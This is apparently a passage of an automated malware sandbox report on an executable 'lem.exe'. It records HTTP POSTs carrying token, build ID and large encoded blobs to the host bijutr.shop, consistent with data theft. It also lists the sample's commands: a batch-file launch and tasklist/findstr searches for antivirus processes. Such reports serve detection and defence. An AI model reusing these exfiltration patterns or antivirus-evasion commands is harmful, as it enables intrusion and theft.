                                                                                                                                                                                                                                                                                                  Data Ascii: AAAU+hcDAAAg8QMg8cEOR91qzPAXltfw1boRgwAAFmDyP/r8Iv/VYvsUaEU0EwAM8WJRfxWi/FXjX4E6xGLTQhW/xWU2EkA/1UIWYPGBDv3deuLTfxfM81e6Mrs/v+L5V3CBACL/1WL7ItFCIsAOwWQHU0AdAdQ6Pr+//9ZXcOL/1WL7ItFCIsAOwWMHU0AdAdQ6N/+//9ZXcPpMPz//2g4IUMAuYQdTQDodv///2hTIUMAuYgdTQDoZ/////81
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:50 UTC3476OUTData Raw: 64 74 7a 2f 2f 31 6d 68 63 42 74 4e 41 49 4d 6b 73 41 42 47 36 35 33 48 52 66 7a 2b 2f 2f 2f 2f 36 41 6b 41 41 41 43 4c 52 65 54 6f 41 37 33 2b 2f 38 4e 71 43 4f 67 75 34 76 2f 2f 57 63 4f 4c 2f 31 57 4c 37 46 61 4c 64 51 68 58 6a 58 34 4d 69 77 66 42 36 41 32 6f 41 58 51 6b 69 77 66 42 36 41 61 6f 41 58 51 62 2f 33 59 45 36 43 54 63 2f 2f 39 5a 75 4c 2f 2b 2f 2f 2f 77 49 51 63 7a 77 49 6c 47 42 49 6b 47 69 55 59 49 58 31 35 64 77 2b 6a 6b 72 51 41 41 4a 51 41 44 41 41 44 44 69 2f 39 56 69 2b 78 52 69 31 55 55 69 30 30 49 56 6f 58 53 64 51 32 46 79 58 55 4e 4f 55 30 4d 64 53 59 7a 77 4f 73 7a 68 63 6c 30 48 6f 74 46 44 49 58 41 64 42 65 46 30 6e 55 48 4d 38 42 6d 69 51 48 72 35 6f 74 31 45 49 58 32 64 52 73 7a 77 47 61 4a 41 65 6a 4f 70 50 2f 2f 61 68 5a
                                                                                                                                                                                                                                                                                                  Data Ascii: dtz//1mhcBtNAIMksABG653HRfz+////6AkAAACLReToA73+/8NqCOgu4v//WcOL/1WL7FaLdQhXjX4MiwfB6A2oAXQkiwfB6AaoAXQb/3YE6CTc//9ZuL/+///wIQczwIlGBIkGiUYIX15dw+jkrQAAJQADAADDi/9Vi+xRi1UUi00IVoXSdQ2FyXUNOU0MdSYzwOszhcl0HotFDIXAdBeF0nUHM8BmiQHr5ot1EIX2dRszwGaJAejOpP//ahZ
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:51 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  43192.168.2.550050188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----5PP8Q9ZUA1NYMY5FCTR1
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 6985
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:52 UTC6985OUTData Raw: 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 50 50 38 51 39 5a 55 41 31 4e 59 4d 59 35 46 43 54 52 31 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------5PP8Q9ZUA1NYMY5FCTR1Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------5PP8Q9ZUA1NYMY5FCTR1Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:53 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  44192.168.2.550060188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----GD2NY5P8Q9RQIMYUSJEU
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 117941
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------GD2NY5P8Q9RQIMYUSJEUContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------GD2NY5P8Q9RQIMYUSJEUContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------GD2NY5P8Q9RQIMYUSJEUCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 58 34 36 50 72 2b 2f 2f 2b 44 78 41 69 4c 52 66 52 66 58 6c 75 4c 35 56 33 44 69 30 55 49 67 54 68 6a 63 32 33 67 64 54 69 44 50 61 41 58 53 67 41 41 64 43 39 6f 6f 42 64 4b 41 4f 67 50 37 51 45 41 67 38 51 45 68 63 42 30 47 34 73 31 6f 42 64 4b 41 49 76 4f 61 67 48 2f 64 51 6a 2f 46 5a 54 59 53 51 44 2f 31 6f 74 31 38 49 50 45 43 49 74 46 43 49 74 4e 44 49 76 51 36 4a 51 4b 41 41 43 4c 52 51 77 35 65 41 78 30 45 6d 67 55 30 45 77 41 56 6f 76 58 69 38 6a 6f 6d 51 6f 41 41 49 74 46 44 46 62 2f 64 66 69 4a 57 41 7a 6f 65 76 37 2f 2f 34 74 4e 37 49 50 45 43 49 76 57 69 30 6b 49 36 45 49 4b 41 41 44 4d 56 59 76 73 55 56 46 54 69 31 30 4d 56 6f 74 31 46 46 65 4c 41 34 74 49 45 49 74 34 44 49 6c 4e 2b 49 76 50 69 55 33 38 69 39 47 46 39 6e 67 38 69 33 58 34 61
                                                                                                                                                                                                                                                                                                  Data Ascii: X46Pr+//+DxAiLRfRfXluL5V3Di0UIgThjc23gdTiDPaAXSgAAdC9ooBdKAOgP7QEAg8QEhcB0G4s1oBdKAIvOagH/dQj/FZTYSQD/1ot18IPECItFCItNDIvQ6JQKAACLRQw5eAx0EmgU0EwAVovXi8jomQoAAItFDFb/dfiJWAzoev7//4tN7IPECIvWi0kI6EIKAADMVYvsUVFTi10MVot1FFeLA4tIEIt4DIlN+IvPiU38i9GF9ng8i3X4a
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 6a 76 77 44 34 49 59 2f 2f 2f 2f 6a 56 42 32 5a 6a 76 79 44 34 4b 6c 41 41 41 41 6a 55 49 4b 5a 6a 76 77 44 34 49 41 2f 2f 2f 2f 75 6c 41 4f 41 41 42 6d 4f 2f 49 50 67 6f 73 41 41 41 43 4e 51 67 70 6d 4f 2f 41 50 67 75 62 2b 2f 2f 2b 4e 55 48 5a 6d 4f 2f 4a 79 64 34 31 43 43 6d 59 37 38 41 2b 43 30 76 37 2f 2f 34 50 43 55 47 59 37 38 6e 4a 6a 67 38 42 51 5a 6a 76 77 44 34 4b 2b 2f 76 2f 2f 75 6b 41 51 41 41 42 6d 4f 2f 4a 79 54 59 31 43 43 6d 59 37 38 41 2b 43 71 50 37 2f 2f 37 72 67 46 77 41 41 5a 6a 76 79 63 6a 65 4e 51 67 70 6d 4f 2f 41 50 67 70 4c 2b 2f 2f 2b 44 77 6a 42 6d 4f 2f 4a 79 49 34 50 41 4d 47 59 37 38 48 4d 62 36 58 33 2b 2f 2f 2b 34 47 76 38 41 41 47 59 37 38 41 2b 43 62 2f 37 2f 2f 34 50 49 2f 34 50 34 2f 33 55 65 61 6b 46 59 5a 6a 76 47
                                                                                                                                                                                                                                                                                                  Data Ascii: jvwD4IY////jVB2ZjvyD4KlAAAAjUIKZjvwD4IA////ulAOAABmO/IPgosAAACNQgpmO/APgub+//+NUHZmO/Jyd41CCmY78A+C0v7//4PCUGY78nJjg8BQZjvwD4K+/v//ukAQAABmO/JyTY1CCmY78A+CqP7//7rgFwAAZjvycjeNQgpmO/APgpL+//+DwjBmO/JyI4PAMGY78HMb6X3+//+4Gv8AAGY78A+Cb/7//4PI/4P4/3UeakFYZjvG
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 2f 76 35 2b 41 39 43 44 38 50 38 7a 77 6f 50 42 42 4b 6b 41 41 51 47 42 64 4f 69 4c 51 66 79 45 77 48 51 79 68 4f 52 30 4a 4b 6b 41 41 50 38 41 64 42 4f 70 41 41 41 41 2f 33 51 43 36 38 32 4e 51 66 2b 4c 54 43 51 45 4b 38 48 44 6a 55 48 2b 69 30 77 6b 42 43 76 42 77 34 31 42 2f 59 74 4d 4a 41 51 72 77 63 4f 4e 51 66 79 4c 54 43 51 45 4b 38 48 44 69 2f 39 56 69 2b 78 52 6f 62 67 64 54 51 42 58 68 63 41 50 68 59 77 41 41 41 43 4c 66 52 43 46 2f 77 2b 45 6c 41 41 41 41 49 74 56 43 49 58 53 64 52 66 6f 6f 32 51 41 41 4d 63 41 46 67 41 41 41 4f 69 72 6d 51 41 41 75 50 2f 2f 2f 33 2f 72 64 6f 74 4e 44 49 58 4a 64 4f 4a 54 56 6d 70 42 57 32 70 61 58 69 76 52 69 58 58 38 36 77 4e 71 57 6c 34 50 74 77 51 4b 5a 6a 76 44 63 67 31 6d 4f 38 5a 33 43 49 50 41 49 41 2b
                                                                                                                                                                                                                                                                                                  Data Ascii: /v5+A9CD8P8zwoPBBKkAAQGBdOiLQfyEwHQyhOR0JKkAAP8AdBOpAAAA/3QC682NQf+LTCQEK8HDjUH+i0wkBCvBw41B/YtMJAQrwcONQfyLTCQEK8HDi/9Vi+xRobgdTQBXhcAPhYwAAACLfRCF/w+ElAAAAItVCIXSdRfoo2QAAMcAFgAAAOirmQAAuP///3/rdotNDIXJdOJTVmpBW2paXivRiXX86wNqWl4PtwQKZjvDcg1mO8Z3CIPAIA+
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 31 6b 50 72 2f 2f 77 50 42 69 59 53 31 6b 50 72 2f 2f 34 50 53 41 45 61 4c 79 6a 76 7a 64 65 53 46 79 51 2b 45 6a 67 41 41 41 49 75 46 6a 50 72 2f 2f 34 50 34 63 33 4e 5a 69 59 79 46 6b 50 72 2f 2f 34 75 64 6a 50 72 2f 2f 30 4f 4a 6e 59 7a 36 2f 2f 2f 72 63 7a 50 41 55 49 6d 46 37 50 62 2f 2f 34 6d 46 6a 50 72 2f 2f 34 32 46 38 50 62 2f 2f 31 43 4e 68 5a 44 36 2f 2f 39 6f 7a 41 45 41 41 46 44 6f 63 68 45 41 41 49 50 45 45 44 4c 41 36 53 7a 2f 2f 2f 2b 44 70 62 7a 34 2f 2f 38 41 67 36 57 4d 2b 76 2f 2f 41 47 6f 41 36 77 38 7a 77 46 43 4a 68 59 7a 36 2f 2f 2b 4a 68 62 7a 34 2f 2f 2b 4e 68 63 44 34 2f 2f 39 51 6a 59 57 51 2b 76 2f 2f 61 4d 77 42 41 41 42 51 36 43 38 52 41 41 43 44 78 42 43 4c 6e 59 7a 36 2f 2f 2b 4a 6e 65 54 32 2f 2f 2b 4c 6c 64 7a 32 2f 2f
                                                                                                                                                                                                                                                                                                  Data Ascii: 1kPr//wPBiYS1kPr//4PSAEaLyjvzdeSFyQ+EjgAAAIuFjPr//4P4c3NZiYyFkPr//4udjPr//0OJnYz6///rczPAUImF7Pb//4mFjPr//42F8Pb//1CNhZD6//9ozAEAAFDochEAAIPEEDLA6Sz///+Dpbz4//8Ag6WM+v//AGoA6w8zwFCJhYz6//+Jhbz4//+NhcD4//9QjYWQ+v//aMwBAABQ6C8RAACDxBCLnYz6//+JneT2//+Lldz2//
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 55 41 41 4d 63 41 46 67 41 41 41 49 50 49 2f 31 33 44 69 2f 39 56 69 2b 79 44 37 42 43 44 66 51 67 41 64 52 72 6f 4d 41 55 41 41 4d 63 41 46 67 41 41 41 4f 67 34 4f 67 41 41 67 38 6a 2f 43 39 44 70 61 51 45 41 41 46 62 2f 64 51 6a 6f 6a 75 76 2f 2f 31 6d 4c 54 51 69 4c 38 44 50 41 4f 55 45 49 66 51 4f 4a 51 51 68 54 56 32 6f 42 55 46 42 57 36 44 61 6d 41 41 43 4c 32 6f 50 45 45 49 76 34 69 58 33 34 68 64 74 2f 44 67 2b 4d 37 41 41 41 41 49 58 2f 44 34 4c 6b 41 41 41 41 69 30 55 49 69 30 41 4d 71 4d 42 31 46 49 74 46 43 49 74 41 43 4a 6b 72 2b 49 76 48 47 39 71 4c 30 2b 6b 48 41 51 41 41 69 38 61 44 35 6a 2f 42 2b 41 5a 72 7a 6a 43 4a 52 66 53 4c 42 49 58 6f 48 30 30 41 69 55 33 77 69 6b 51 42 4b 59 74 4e 43 49 68 46 2f 34 73 42 4b 30 45 45 69 30 6b 4d 6d
                                                                                                                                                                                                                                                                                                  Data Ascii: UAAMcAFgAAAIPI/13Di/9Vi+yD7BCDfQgAdRroMAUAAMcAFgAAAOg4OgAAg8j/C9DpaQEAAFb/dQjojuv//1mLTQiL8DPAOUEIfQOJQQhTV2oBUFBW6DamAACL2oPEEIv4iX34hdt/Dg+M7AAAAIX/D4LkAAAAi0UIi0AMqMB1FItFCItACJkr+IvHG9qL0+kHAQAAi8aD5j/B+AZrzjCJRfSLBIXoH00AiU3wikQBKYtNCIhF/4sBK0EEi0kMm
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC16355OUTData Raw: 52 39 31 71 7a 50 41 58 6c 74 66 77 31 62 6f 52 67 77 41 41 46 6d 44 79 50 2f 72 38 49 76 2f 56 59 76 73 55 61 45 55 30 45 77 41 4d 38 57 4a 52 66 78 57 69 2f 46 58 6a 58 34 45 36 78 47 4c 54 51 68 57 2f 78 57 55 32 45 6b 41 2f 31 55 49 57 59 50 47 42 44 76 33 64 65 75 4c 54 66 78 66 4d 38 31 65 36 4d 72 73 2f 76 2b 4c 35 56 33 43 42 41 43 4c 2f 31 57 4c 37 49 74 46 43 49 73 41 4f 77 57 51 48 55 30 41 64 41 64 51 36 50 72 2b 2f 2f 39 5a 58 63 4f 4c 2f 31 57 4c 37 49 74 46 43 49 73 41 4f 77 57 4d 48 55 30 41 64 41 64 51 36 4e 2f 2b 2f 2f 39 5a 58 63 50 70 4d 50 7a 2f 2f 32 67 34 49 55 4d 41 75 59 51 64 54 51 44 6f 64 76 2f 2f 2f 32 68 54 49 55 4d 41 75 59 67 64 54 51 44 6f 5a 2f 2f 2f 2f 2f 38 31 6b 42 31 4e 41 4f 69 75 2f 76 2f 2f 2f 7a 57 4d 48 55 30 41
                                                                                                                                                                                                                                                                                                  Data Ascii: R91qzPAXltfw1boRgwAAFmDyP/r8Iv/VYvsUaEU0EwAM8WJRfxWi/FXjX4E6xGLTQhW/xWU2EkA/1UIWYPGBDv3deuLTfxfM81e6Mrs/v+L5V3CBACL/1WL7ItFCIsAOwWQHU0AdAdQ6Pr+//9ZXcOL/1WL7ItFCIsAOwWMHU0AdAdQ6N/+//9ZXcPpMPz//2g4IUMAuYQdTQDodv///2hTIUMAuYgdTQDoZ/////81kB1NAOiu/v///zWMHU0A
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:53 UTC3456OUTData Raw: 36 35 33 48 52 66 7a 2b 2f 2f 2f 2f 36 41 6b 41 41 41 43 4c 52 65 54 6f 41 37 33 2b 2f 38 4e 71 43 4f 67 75 34 76 2f 2f 57 63 4f 4c 2f 31 57 4c 37 46 61 4c 64 51 68 58 6a 58 34 4d 69 77 66 42 36 41 32 6f 41 58 51 6b 69 77 66 42 36 41 61 6f 41 58 51 62 2f 33 59 45 36 43 54 63 2f 2f 39 5a 75 4c 2f 2b 2f 2f 2f 77 49 51 63 7a 77 49 6c 47 42 49 6b 47 69 55 59 49 58 31 35 64 77 2b 6a 6b 72 51 41 41 4a 51 41 44 41 41 44 44 69 2f 39 56 69 2b 78 52 69 31 55 55 69 30 30 49 56 6f 58 53 64 51 32 46 79 58 55 4e 4f 55 30 4d 64 53 59 7a 77 4f 73 7a 68 63 6c 30 48 6f 74 46 44 49 58 41 64 42 65 46 30 6e 55 48 4d 38 42 6d 69 51 48 72 35 6f 74 31 45 49 58 32 64 52 73 7a 77 47 61 4a 41 65 6a 4f 70 50 2f 2f 61 68 5a 65 69 54 44 6f 31 39 6e 2f 2f 34 76 47 58 6f 76 6c 58 63 4e
                                                                                                                                                                                                                                                                                                  Data Ascii: 653HRfz+////6AkAAACLReToA73+/8NqCOgu4v//WcOL/1WL7FaLdQhXjX4MiwfB6A2oAXQkiwfB6AaoAXQb/3YE6CTc//9ZuL/+///wIQczwIlGBIkGiUYIX15dw+jkrQAAJQADAADDi/9Vi+xRi1UUi00IVoXSdQ2FyXUNOU0MdSYzwOszhcl0HotFDIXAdBeF0nUHM8BmiQHr5ot1EIX2dRszwGaJAejOpP//ahZeiTDo19n//4vGXovlXcN
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:55 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                                                                  Start time:00:59:56
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\lem.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\lem.exe"
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  File size:1'273'852 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:5782BEA403267E4A6DDF82263332ED59
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                                                                  Start time:00:59:57
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                                                                  Start time:00:59:57
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                                                                  Start time:00:59:59
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                                                                  Start time:00:59:59
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7c0000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                                                                  Start time:01:00:00
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                                                                  Imagebase:0x890000
                                                                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                                                                  Start time:01:00:00
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                                                  Imagebase:0x7c0000
                                                                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                                                                  Start time:01:00:00
                                                                                                                                                                                                                                                                                                  Start date:27/12/2024
                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                  Commandline:cmd /c md 105235
                                                                                                                                                                                                                                                                                                  Imagebase:0x790000
                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
